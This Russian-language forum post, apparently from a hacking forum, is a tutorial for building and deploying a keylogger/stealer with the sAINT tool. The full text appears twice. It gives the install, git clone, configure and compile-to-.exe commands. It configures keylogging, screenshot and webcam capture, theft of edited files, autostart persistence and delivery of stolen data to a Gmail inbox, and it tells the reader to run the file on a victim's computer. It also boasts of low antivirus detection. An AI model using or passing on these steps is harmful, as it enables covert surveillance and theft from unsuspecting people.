Удалённый пользователь 67689
Guest
У
Удалённый пользователь 67689
Guest
Всем привет!
Сегодня я вам расскажу как легко сделать хороший стиллер.
Хотя... Его нельзя назвать даже стиллером как таковым.
Что будет делать этот вирус?
1. KeyLogger
2. Скриншот экрана
3. Воруется файл, если человек в нем что то редактирует.
4. Фотография с Web-Камеры
И вирус почти не будет палиться антивирусами. Ну как... 19 / 63. Конечно палиться популярными.
Кстати у трояна есть единственный минус. Он работает только с установленной яве на компе. То есть если у жертвы на компе не установлен java, вирус не будет работать.
Но есть хорошая новость. Когда он запустит приложение, будет окно, предупреждающее что java не установения и открывает страницу установки.
Теперь нам нужно создать почту gmail. Именно gmail! С другими работать не будет.
Так же предоставьте почте доступ к неизвестным приложениями. (Пароль кстати советую указывать не свой. Разобрать вирус можно и спиздить пароль.)
Теперь наконец можно переходить с самому созданию стиллера!
В первую очередь нам надо запустить linux и начать скачивать доп. приложения.
Пишем первую команду для обновления дистрибутивов : apt get
Начинаем скачивать:
1) apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y
2) git clone https://github.com/tiagorlampert/sAINT
И начинаем настройку.
1. cd sAINT
2. chmod +x configure.sh
3. ./configure.sh
4. java -jar sAINT.jar
Теперь жмите enter. И дальшей начинаем настройку.
Email - Это мы указываем заранее подготовленную почту
Password - Пароль от почты
Screenshot - Указываем, делать скриншоты или нет. Y - Да, N - Нет. (Дальше так же)
WebCam - Фотографировать ли с вебки.
Persistence - Разрешить ли файлу скопироваться в диск и автозагрузку.
Keep data - Качать ли все это на компьютер.
Number lf characters - Сколько символов нужно своровать для отправки отчета. То есть 300 символов написано, на почту отправляется отчет с ними. Можно указать сколько хотите. Совет. 300 не указывайте, это я для примера. Очень много будет писем.
После всего продолжаем и жмем enter. У вас будет подтверждение данных, жмем "y".
И потом опять жмем "y" для компеляции в .exe.
Теперь вам осталось зайти в папку куда сгенерировался файл.
Файл находится в папке sAINT => launch4j
Открываем файл на компьютере жертвы и в скором времени нам на почту будет приходить это:
Выше у нас те самые 300 сворованных символов.
Ниже скриншот экрана, веб-камеры (черный, нету вебки у меня.), и текстовой документ в котором я в данный момент редактировал.
В общем на этой ноте я хочу закончить свою статью.
Спасибо за внимание. Удачи в начинаниях.
Сегодня я вам расскажу как легко сделать хороший стиллер.
Хотя... Его нельзя назвать даже стиллером как таковым.
Что будет делать этот вирус?
1. KeyLogger
2. Скриншот экрана
3. Воруется файл, если человек в нем что то редактирует.
4. Фотография с Web-Камеры
И вирус почти не будет палиться антивирусами. Ну как... 19 / 63. Конечно палиться популярными.
Кстати у трояна есть единственный минус. Он работает только с установленной яве на компе. То есть если у жертвы на компе не установлен java, вирус не будет работать.
Но есть хорошая новость. Когда он запустит приложение, будет окно, предупреждающее что java не установения и открывает страницу установки.
Теперь нам нужно создать почту gmail. Именно gmail! С другими работать не будет.
Так же предоставьте почте доступ к неизвестным приложениями. (Пароль кстати советую указывать не свой. Разобрать вирус можно и спиздить пароль.)
Теперь наконец можно переходить с самому созданию стиллера!
В первую очередь нам надо запустить linux и начать скачивать доп. приложения.
Пишем первую команду для обновления дистрибутивов : apt get
Начинаем скачивать:
1) apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y
2) git clone https://github.com/tiagorlampert/sAINT
И начинаем настройку.
1. cd sAINT
2. chmod +x configure.sh
3. ./configure.sh
4. java -jar sAINT.jar
Теперь жмите enter. И дальшей начинаем настройку.
Email - Это мы указываем заранее подготовленную почту
Password - Пароль от почты
Screenshot - Указываем, делать скриншоты или нет. Y - Да, N - Нет. (Дальше так же)
WebCam - Фотографировать ли с вебки.
Persistence - Разрешить ли файлу скопироваться в диск и автозагрузку.
Keep data - Качать ли все это на компьютер.
Number lf characters - Сколько символов нужно своровать для отправки отчета. То есть 300 символов написано, на почту отправляется отчет с ними. Можно указать сколько хотите. Совет. 300 не указывайте, это я для примера. Очень много будет писем.
После всего продолжаем и жмем enter. У вас будет подтверждение данных, жмем "y".
И потом опять жмем "y" для компеляции в .exe.
Теперь вам осталось зайти в папку куда сгенерировался файл.
Файл находится в папке sAINT => launch4j
Открываем файл на компьютере жертвы и в скором времени нам на почту будет приходить это:
Выше у нас те самые 300 сворованных символов.
Ниже скриншот экрана, веб-камеры (черный, нету вебки у меня.), и текстовой документ в котором я в данный момент редактировал.
В общем на этой ноте я хочу закончить свою статью.
Спасибо за внимание. Удачи в начинаниях.